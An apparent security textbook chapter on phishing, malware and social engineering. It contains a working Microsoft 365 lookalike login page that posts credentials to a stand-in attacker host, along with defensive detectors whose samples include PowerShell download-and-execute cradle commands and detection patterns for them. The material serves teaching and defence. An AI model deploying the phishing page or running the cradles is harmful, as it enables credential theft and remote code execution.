We have profiled who attacks and why. Now we examine how they gain initial access: the attack vectors that convert an external threat into an internal incident. Despite billions spent on perimeter defenses, the most reliable attack vectors target the one component that cannot be patched: human psychology. According to Verizon's DBIR, phishing remains the initial access vector in over 90% of data breaches. Understanding these vectors is not only a matter of technical defense; it is about designing systems that are resilient to human error.
Phishing is the fraudulent attempt to obtain sensitive information or deploy malware by impersonating a trustworthy entity. It has evolved far beyond poorly spelled Nigerian prince emails. Spear-phishing targets specific individuals with personalized context harvested from social media and corporate websites. Whaling targets C-suite executives. Business Email Compromise (BEC) impersonates vendors or executives to trick finance departments into wiring funds. SMS-based smishing and voice-based vishing extend the attack surface beyond email.
```html
<!-- Simple credential-harvesting phishing page (for educational red-team simulation) -->
<!DOCTYPE html>
<html>
<head><title>Microsoft 365 Login</title></head>
<body style="font-family: 'Segoe UI', sans-serif; background: #f3f2f1;">
<div style="max-width: 440px; margin: 100px auto; padding: 44px; background: white; box-shadow: 0 2px 6px rgba(0,0,0,0.1);">
<img src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" width="108" alt="Microsoft Logo">
<h2 style="font-weight: 600;">Sign in</h2>
<!-- The form POSTs to an attacker-controlled server, not Microsoft -->
<form method="POST" action="https://attacker-c2.example.com/collect">
<input type="email" name="email" placeholder="Email, phone, or Skype" style="width:100%; padding:8px; margin:8px 0;" required>
<input type="password" name="password" placeholder="Password" style="width:100%; padding:8px; margin:8px 0;" required>
<button type="submit" style="width:100%; padding:10px; background:#0067b8; color:white; border:none;">Sign in</button>
</form>
</div>
</body>
</html>
<!-- This page is visually identical to the legitimate Microsoft login; the only tell is the form action URL -->
```

The HTML above demonstrates how trivially an attacker can clone a legitimate login page. The visual rendering is pixel-perfect; the only indicator of fraud is the `action` attribute pointing to `attacker-c2.example.com`. This is why security awareness training must teach users to inspect the URL bar, not just the page appearance. Technical controls such as browser-based phishing detection and email security gateways add layers of defense, but they are not foolproof.
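A defender-side check for exactly the tell described above, written for this page as an added example (it is not code from the original page): it parses an HTML document, finds every form that carries a password field, and flags the ones whose `action` resolves to a host other than the page's own. The sample page, its hypothetical URL and the trusted-host allow-list are constructed for the demonstration.

```python
"""Flag HTML forms that collect a password and submit it to a host other
than the one serving the page (the 'form action URL' tell).

Added example, not code from the original page. The sample HTML, the
hypothetical page URL and the allow-list below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormCollector(HTMLParser):
    """Collect every <form> with its resolved action URL and input types."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or empty action submits to the page's own URL;
            # relative actions are resolved against the page URL.
            action = attrs.get("action") or self.page_url
            self._current = {
                "action": urljoin(self.page_url, action),
                "method": (attrs.get("method") or "GET").upper(),
                "input_types": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["input_types"].append((attrs.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host(url):
    """Lower-cased hostname. A production check would compare registrable
    domains (eTLD+1) so that sso.example.com and www.example.com count as
    one site; this demo compares hostnames exactly and relies on the
    trusted_hosts allow-list for legitimate cross-host SSO."""
    return (urlparse(url).hostname or "").lower()


def find_credential_exfil_forms(html, page_url, trusted_hosts=()):
    """Return findings for forms that contain a password field and post
    to a host that is neither the page's own host nor in trusted_hosts."""
    parser = _FormCollector(page_url)
    parser.feed(html)
    page_host = _host(page_url)
    findings = []
    for form in parser.forms:
        if "password" not in form["input_types"]:
            continue
        action_host = _host(form["action"])
        if action_host == page_host or action_host in trusted_hosts:
            continue
        findings.append({
            "action": form["action"],
            "action_host": action_host,
            "page_host": page_host,
            "method": form["method"],
            "reason": "password form submits to a third-party host",
        })
    return findings


# Constructed sample: a lookalike page on a typo domain whose login form
# posts the password to a third, unrelated host. A second form without a
# password field (site search) shows what is deliberately ignored.
SAMPLE_PAGE_URL = "https://login.micros0ft-account.example/"  # constructed
SAMPLE_HTML = """
<html><body>
<form method="POST" action="https://collector.example.net/submit">
  <input type="email" name="email">
  <input type="password" name="password">
  <button type="submit">Sign in</button>
</form>
<form method="GET" action="/search">
  <input type="text" name="q">
</form>
</body></html>
"""

if __name__ == "__main__":
    for f in find_credential_exfil_forms(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(f"[!] {f['reason']}: {f['method']} {f['action']} (page host: {f['page_host']})")
```

The hostname comparison is the same one a password manager performs implicitly when it declines to autofill on a domain it has no saved entry for, which is why the table below lists it as the top control against harvesting pages. Strict equality means a legitimate site that posts credentials to a separate SSO host would also be flagged; that is what the `trusted_hosts` parameter is for, and an email gateway that fetches linked pages could run this over the retrieved document.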
Malware (malicious software) encompasses viruses, worms, trojans, ransomware, spyware, adware, and rootkits. Delivery mechanisms vary (email attachments, malicious websites, infected USB drives), but the infection chain follows a predictable pattern: delivery, execution, persistence, command-and-control (C2) communication, and objective completion. Modern malware often uses 'living-off-the-land' techniques, abusing legitimate system tools such as PowerShell and WMI to evade signature-based antivirus.
Social engineering exploits human psychology rather than technical vulnerabilities. Pretexting creates a fabricated scenario to obtain information (posing as IT support to request a password reset). Baiting uses curiosity or greed (dropping infected USB drives in a parking lot labeled 'Salary Data 2026'). Tailgating bypasses physical security by following an authorized person through a secured door. The 2020 Twitter hack, which compromised high-profile accounts including Barack Obama and Elon Musk, succeeded entirely through social engineering: attackers called Twitter employees posing as IT staff and convinced them to hand over credentials.
💡 Social engineering exploits cognitive biases: authority bias (obeying someone who sounds authoritative), urgency bias (acting fast when told 'this is an emergency'), and scarcity bias (pursuing limited-time offers). Technical controls cannot fully mitigate these; security culture and verification procedures are the primary defense.
| Attack Vector | Category | Primary Exploited Weakness | Top Defensive Control | User Training Cue |
|---|---|---|---|---|
| Spear-phishing email | Phishing | Trust in known contacts + urgency bias | Email security gateway + DMARC/DKIM/SPF | Check sender's actual email address, not display name |
| Credential harvesting page | Phishing | Visual trust in familiar login screens | Password manager (won't autofill on fake domain) | Check URL bar for correct domain before typing password |
| Malicious Office macro | Malware | Users enable macros when document claims to be 'protected' | Disable macros by default via GPO; block macros from internet | Never enable macros on documents from external sources |
| PowerShell download cradle | Malware (LOTL) | PowerShell execution policies too permissive | Constrained Language Mode + script block logging | Report unexpected PowerShell windows immediately |
| Pretexting phone call | Social Engineering | Authority bias + lack of verification procedures | Callback verification using known phone numbers | Always verify identity through a separate channel |
| USB baiting | Social Engineering | Curiosity + trust in physical media | Disable AutoRun; USB device control policies | Never plug in found USB drives; report them to security |
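To make the 'living-off-the-land' pattern from the malware paragraph and the 'PowerShell download cradle' row of the table concrete, here is an added detection example (not code from the original page) that triages PowerShell script block log entries: it looks for a remote-fetch primitive combined with an in-memory execution primitive, and decodes `-EncodedCommand` payloads before scoring them, since the cradle is often hidden there. The four log records are constructed and only mimic the ScriptBlockText field of Event ID 4104; the URLs in them are placeholders.

```python
"""Triage PowerShell script-block log entries for download-cradle behaviour.

Added example (not from the original page). The records below are
constructed and mimic the ScriptBlockText field of Event ID 4104; the
URLs they contain are placeholders.
"""
import base64
import re

# Primitives that pull content from a remote host. Matching is done on
# lower-cased text, so the patterns are written in lower case.
DOWNLOAD_PATTERNS = {
    "DownloadString": r"\bdownloadstring\b",
    "DownloadFile": r"\bdownloadfile\b",
    "Invoke-WebRequest": r"\b(?:invoke-webrequest|iwr)\b",
    "Invoke-RestMethod": r"\b(?:invoke-restmethod|irm)\b",
    "Net.WebClient": r"\bnet\.webclient\b",
    "Start-BitsTransfer": r"\bstart-bitstransfer\b",
}
# Primitives that run fetched text without writing a script to disk.
EXECUTE_PATTERNS = {
    "Invoke-Expression": r"\b(?:invoke-expression|iex)\b",
    "ScriptBlock.Create": r"\[scriptblock\]::create\b",
}
# -EncodedCommand and the abbreviations PowerShell accepts, then base64.
ENCODED_FLAG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")


def encode_for_powershell(script):
    """Base64 of UTF-16LE text, the encoding -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob):
    """Inverse of encode_for_powershell; None if the blob is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_script_block(text):
    """Return {'verdict': ..., 'indicators': [...]} for one script block.
    Encoded payloads are decoded and analysed recursively so that the
    indicators inside them count toward the verdict."""
    indicators = []
    # Handle encoded payloads first, then strip them so their base64
    # cannot produce accidental pattern matches in the outer text.
    for match in ENCODED_FLAG.finditer(text):
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            indicators.append("EncodedCommand")
            inner = analyse_script_block(decoded)
            indicators.extend(i for i in inner["indicators"] if i not in indicators)
    stripped = ENCODED_FLAG.sub(" ", text).lower()
    for name, pattern in {**DOWNLOAD_PATTERNS, **EXECUTE_PATTERNS}.items():
        if name not in indicators and re.search(pattern, stripped):
            indicators.append(name)

    downloads = any(n in DOWNLOAD_PATTERNS for n in indicators)
    executes = any(n in EXECUTE_PATTERNS for n in indicators)
    if downloads and executes:
        verdict = "download-cradle"  # fetch + in-memory execute: high confidence
    elif "EncodedCommand" in indicators:
        verdict = "encoded-command"  # obfuscation alone: worth a look
    elif downloads:
        verdict = "remote-fetch"     # downloads also happen legitimately: low
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": indicators}


def triage(records):
    """Run analyse_script_block over log records, keeping the record id
    and user alongside the verdict so an analyst can pivot on them."""
    results = []
    for rec in records:
        verdict = analyse_script_block(rec["ScriptBlockText"])
        results.append({"id": rec["id"], "user": rec["user"], **verdict})
    return results


# Constructed records: a routine admin command, a legitimate download by a
# patching account, a classic cradle, and a cradle hidden behind -enc.
SAMPLE_4104_RECORDS = [
    {"id": 1, "user": "CORP\\jdoe",
     "ScriptBlockText": "Get-ChildItem -Path C:\\Reports | Sort-Object LastWriteTime"},
    {"id": 2, "user": "CORP\\svc_patch",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.placeholder.example/kb.msi -OutFile C:\\Temp\\kb.msi"},
    {"id": 3, "user": "CORP\\rsmith",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.example/stage.ps1')"},
    {"id": 4, "user": "CORP\\rsmith",
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc "
                        + encode_for_powershell("iex (iwr http://placeholder.example/s)")},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_4104_RECORDS):
        print(f"record {r['id']} {r['user']:<15} {r['verdict']:<16} {', '.join(r['indicators'])}")
```

Record 2 is the caveat the table's 'LOTL' label implies: a download on its own is routine administration, so it scores low, and the high-confidence verdict is reserved for the combination of fetch and in-memory execution. Script block logging is what makes this possible at all; with only process-creation events, record 4 would show just the base64 blob.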
⚠️ The most effective phishing email is the one your security team never sees because the user deleted it without reporting it. Implement a 'report phishing' button that is easier to use than deleting the email. Gamify reporting: reward users who catch simulated phishing tests, and don't punish those who fail.